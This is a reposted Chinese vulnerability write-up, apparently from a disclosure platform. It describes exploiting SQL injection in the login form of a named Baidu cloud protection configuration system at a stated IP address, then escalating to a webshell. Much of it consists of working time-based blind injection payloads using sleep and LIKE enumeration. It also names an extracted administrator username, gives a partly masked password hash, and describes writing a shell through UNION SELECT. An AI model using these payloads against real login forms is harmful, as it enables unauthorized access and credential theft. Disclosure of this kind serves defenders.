百度某系统SQL注入到Getshell【转】

http://103.235.46.165 百度云主防配置系统

http://103.235.46.165/index.php/Manage/login

post:username=test&password=test
{"status":0,"info":"用户密码不正确","data":false}

http://103.235.46.165/index.php/Manage/login

post:username=test'&password=test

{"status":0,"info":"用户名不存在","data":false}

登录点是 无论用户名密码对错都是用户密码不正确 但是’ 出现用户名不存在

post:username=test’ or sleep(1)#&password=test 延迟10秒 里面有8个用户好像

sqlmap可以跑 但是非常非常慢 几乎跑不出 跑半天一个字母没看到

登录处 那就直接查同表信息 登录即可

username=test' or username like '%' and sleep(1)#&password=test

延时 字段username 同理password也存在
先读个用户名出来

username=test' or username like 't%' and sleep(1)#&password=test

延迟了 依次注出用户 tanguangxi

username=tanguangxi' and password like '3%' and sleep(5)#&password=test

依次注出password

31c724c7395d4367dfa6d4**********

解出登录

后台有2个地方可上传任意文件 却不返回路径
有几处连接报错

猜测上传路径 无果

苦死很久 想一想回到登录位置 看下注入权限咋样 毕竟拿到路径了

不是root 但是不是root不代表没权限

直接union select写文件试试

order by出字段为9

这台服务器应该还是挺重要的样子
shell几分钟断一次 以为是负载均衡 又不像 未深入

漏洞证明：

http://103.235.46.165/index.php/Manage/login

post:username=test&password=test
{"status":0,"info":"用户密码不正确","data":false}

http://103.235.46.165/index.php/Manage/login

post:username=test'&password=test

{"status":0,"info":"用户名不存在","data":false}

username=test' or username like '%' and sleep(1)#&password=test

username=test' or username like 't%' and sleep(1)#&password=test

username=tanguangxi' and password like '3%' and sleep(5)#&password=test